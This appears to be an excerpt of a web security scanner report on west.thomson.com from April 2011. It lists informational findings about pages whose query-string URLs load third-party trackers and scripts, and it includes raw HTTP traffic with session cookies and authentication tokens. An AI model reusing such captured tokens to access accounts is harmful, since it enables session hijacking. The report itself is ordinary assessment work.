<li><a href="http://advertising.microsoft.com/home/home" target="_blank">Advertise</a>
...[SNIP]...
<li><a href="http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx" target="_blank">Trademark</a>
...[SNIP]...
<div class="msnBCContainer"><a href="http://www.msnbc.com/" id="MsnBCHref" title="Go to msnbc.com" alt="Go to msnbc.com" target="_blank" ><div class="msnBC">
...[SNIP]...
</div><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js"></script><script type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
<noscript><img src="http://c.live.com/c.gif?DI=15666"/></noscript>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c7=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /></noscript>
...[SNIP]...

19.110. http://west.thomson.com/Error/500Error.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /Error/500Error.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA; UserSiteIdIdentifier=; .WTCAUTH=15EB1E2BD55FB642DEFDF69E45C933941D077548D9E77F5DFD86AFA9231864655A2D3B0A5DA53C12ECD77027BFA162DFE1C25838CD6ED0BA7EA11DF766E81FF9BE80932A802690C8D89CCD970BFE43D957372263E299FCB576D90CB191BE9C03BFA81FE18D6C1ABC185B6A95A9C3FE7C6D15760BFC5FE4F3A675D865307B7D2C00D2ADADD2A8C8C503C9A225B6F3DB06817479DC6714AA5F037A2AE2E40D4090AC151A6DF079A011C7D783412F0443C1E4CC8EA514A71C6F69B68B045D51D4F25992FD629E534853F1810AB486114ECE9F7CA350D4192436BFB8E836202640C7A7A9CEA9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:43:02 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=6C2776260A06E0DA7E316662F35CD801FB1884F55F2D184C53D0D2F4AA981F1850DC4F54B455CC740DE6A3A61A343349F17598FFF202335A75BD6FA9930A4102F07FA82899CA9DF3ECE6D45B7DFB1136EF60AAF3D1093EB92D363DEDF846159C5EEA4B2C6654B511316A827828B49D7A8F4BAA567EE0AC56D57D345784960460228A95779E1C4391520F348B9037D5ACF439811F80B15F5EFC008F6F0846F5E0EA79BF17D2624B6A8E054DB0507FE036C08288195B48FA84DF92A90D2ACAFF0CE9218C7C1D32DDD289B076CE7A75DDDCC337F829198E1CBF95448E9FD984AE5899980BD9; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78059


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<div class="FloatRight">
<a href="http://thomsonreuters.com" rel="nofollow" target="_blank">
<img alt="Thomson Reuters" src='http://images.west.thomson.com/buttons/tr_logo_small.jpg'
border="0" />
...[SNIP]...
</div>


<img src="https://bp.specificclick.net?pixid=99064401" id="AlvendaRemarkingTag2" height="0px" width="0px" /><img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" />

<!-- END footer -->
...[SNIP]...
<noscript>
<a href="http://www.omniture.com" title="Web Analytics">
<img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
</noscript>
<!-- End SiteCatalyst code version: H.20.3. -->
<iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe><!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...
<noscript>
<img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" >
</noscript>
...[SNIP]...

19.111. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /productdetail/160547/12484463/productdetail.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:22 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=F31052139A373540424741E268099E6241C09AA45A626DE2A38C22E931FE39A836ECA06504AB5E11D899AB974340AC3CA22EFA3BB0676F1C0B8373726AAD802F355075EA717D1B28441FC4F53A7328B7FD809F21298A2BB310E7B3E4873D669AB0C1DC219FC364772434FECA03988543E0C149CD8DC2D028D16CDF8B7C86EE82F6122626596B9EC5B4BD031E6A0CB5A74116B5FFAE079B9DC014893820F0EF5A0D46558FF9B020B1DB315FE28D9157A01B864D7CF4B3A9F4F24F0CF57722CEACF6E4E538CFC9886E21DFACDFB09725777C42B39CBFDE80E488D41C726AC1CBF53B9A1753; path=/
Cache-Control: private, must-revalidate
Expires: Tue, 26 Apr 2011 20:03:22 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 133357


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
placeHolderContent_ctl00_R3DisplayRight_ctl00_placeHolderTopNavigation_placeHolderContent_ctl00_R3DisplayRight_ctl00_placeHolderTopNavigation_placeHolderContent_ctl00_R3DisplayRight_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<div class="FloatRight">
<a href="http://thomsonreuters.com" rel="nofollow" target="_blank">
<img alt="Thomson Reuters" src='http://images.west.thomson.com/buttons/tr_logo_small.jpg'
border="0" />
...[SNIP]...
</div>


<img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" />

<!-- END footer -->
...[SNIP]...
<noscript>
<a href="http://www.omniture.com" title="Web Analytics">
<img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
</script><iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe><!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...
<noscript>
<img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" >
</noscript>
...[SNIP]...

19.112. http://west.thomson.com/store/secure/ShoppingBasket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=A2B8589473CF8FC8B84582EDCCA18DA921C9607FD66A72923489A9D520F1A72DC25C5881F2C4299AFEC4F650329ED4D92FDB7810CCF374D8369FE4C447608C1AFF940455236DD8C534F6DDF5D9575CABE558EAEAC107A418E22F703D34308342D11D90AB828F7BFA1961EF59A3B04676FA38F27153203526720F64014AAF6FD2BDBA490CBE6FD194CC05A5B2612403A475A4ECE05807201D3CAEBB3AA82896D25B6F9D8910E1764008977756F0D348920ACDA8AA90BA295110ACD3D7783F9EE8463371CE85B2638990312C407C601E69F97C32BD90BA2EC5DFD202985E1A9741F53BA94F

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:39 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=1AAD0C3FDF7CB727B13EB90B8C98976EAD6E00A511FA67F9D5963EFE310C214A08DDC171F1385049DED9703E226ADDBECBD14CCB16D838A0B85D976FDE62983BB5CE86938F6641FEFBED3B18ECACE7E06D913FCDBD87B8BC58E01D96214B3FDDD74927ADA7E9FD593AA5CDFA68CA1978FCD5173D7C37282A5A1268AB89E95FDAF020FECDB864FD6F2EDBEB612F45CFD51AF93067C7D38025292F9C062B7E6B6FC432310E5D483E31C7BEC841EB7CFCFDB02C2D32CE5D9112178D315978B745C8355AE60082D92AAB43A9E1B125FED8B00C7D1C0192B477B1196049A5D9A666AFF52F5647; path=/
Set-Cookie: SbasketVw=T; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 107765


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
tl00_placeHolderTopNavigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<div class="FloatRight">
<a href="http://thomsonreuters.com" rel="nofollow" target="_blank">
<img alt="Thomson Reuters" src='http://images.west.thomson.com/buttons/tr_logo_small.jpg'
border="0" />
...[SNIP]...
</div>


<img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" />

<!-- END footer -->
...[SNIP]...
<noscript>
<a href="http://www.omniture.com" title="Web Analytics">
<img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
</script><iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe><!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...
<noscript>
<img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" >
</noscript>
...[SNIP]...

19.113. http://west.thomson.com/store/secure/ShoppingBasket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/secure/ShoppingBasket.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:24 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=5B554B6F6DD767F208B345EAA979222AFB75B1D39D5072C8AC8163224D602E4EA0791659ECC40EAA04995AD2414A1EF63E920C2406A52D5A77C772B7312571F0AAC96B34372DB47CEF38803A8D2B7154B70F6215558C4BE194B8F6631FFDBEECF7D4256904225BA30EA921CF83C914FF8CF103200841FE605F66B636573E74A9FE11E39E665181B5E833711454838B5B5EDDAB8E52F237C0742B8087456FDD46A9875A0BD3BE7D68841EDA7A916AA72ACAB0B687055A7BCB2C0B64F0382E8FCCEA3EEE09697283C17C482DF2DE2D55F26A8BD1E5F9CC9D2F12F213FCC63F2AE7AFD0ECCE; path=/
Set-Cookie: SbasketVw=T; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 107323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
tl00_placeHolderTopNavigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_ctl00_placeHolderTopNavigation_placeHolderContent_R3Display2_Div_R3Placement --><script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<div class="FloatRight">
<a href="http://thomsonreuters.com" rel="nofollow" target="_blank">
<img alt="Thomson Reuters" src='http://images.west.thomson.com/buttons/tr_logo_small.jpg'
border="0" />
...[SNIP]...
</div>


<img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="AlvendaRemarkingTag" height="1px" width="1px" />

<!-- END footer -->
...[SNIP]...
<noscript>
<a href="http://www.omniture.com" title="Web Analytics">
<img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
</script><iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&abandon_products=162495' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe><!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...
<noscript>
<img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" >
</noscript>
...[SNIP]...

19.114. http://west.thomson.com/support/contact-us/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:34 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=89EA3F93E09614D9A098CCCF9C0F29D3204EE9663C01D51E95CD9C592CDADB23A34786B30EBABB2390E7FEA51BBE62180DADFAF255CA8AB719509015068D68C8075FE6A23F095DF549827C80033255DA36E699502293674B6D668FCAE278ADD04138D880C6A3F40E0EDE98A77853F1F1B45413E1BE2A34BEE937DCCCDA776CE1ABCED0F26FB69F2755769BB874466A73E9A83CADFE53A93539D3BD0332C48F697F141BAC00E38E27C2938518BE9D5C9648C952E2BEF872DC06486975DC27BFACFEF36294DEAF331A255D5995D5F54EF39A2AFCD97B20A7D318572959553AEEC610017BD6; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<link rel="stylesheet" type="text/css" href='http://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<div class="FloatRight">
<a href="http://thomsonreuters.com" rel="nofollow" target="_blank">
<img alt="Thomson Reuters" src='http://images.west.thomson.com/buttons/tr_logo_small.jpg'
border="0" />
...[SNIP]...
<!-- END footer -->

<img src="https://bp.specificclick.net?pixid=99064401" id="AlvendaRemarkingTag2" height="0px" width="0px" /><img src="https://pixel.rubiconproject.com/tap.php?v=5487" id="Img1" height="1px" width="1px" />


<div style="display:none;text-align:center" id="ssurvey">
...[SNIP]...
<noscript>
<a href="http://www.omniture.com" title="Web Analytics">
<img src="https://thomson.112.2o7.net/b/ss/devthwest/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a>
</noscript>
<!-- End SiteCatalyst code version: H.20.3. -->
<iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe><!-- begin Marin Software Tracking Script -->
<script src='http://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...
<noscript>
<img src="https://tracker.marinsm.com/tp?act=1&cid=787f8z6077&script=no" >
</noscript>
...[SNIP]...

19.115. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
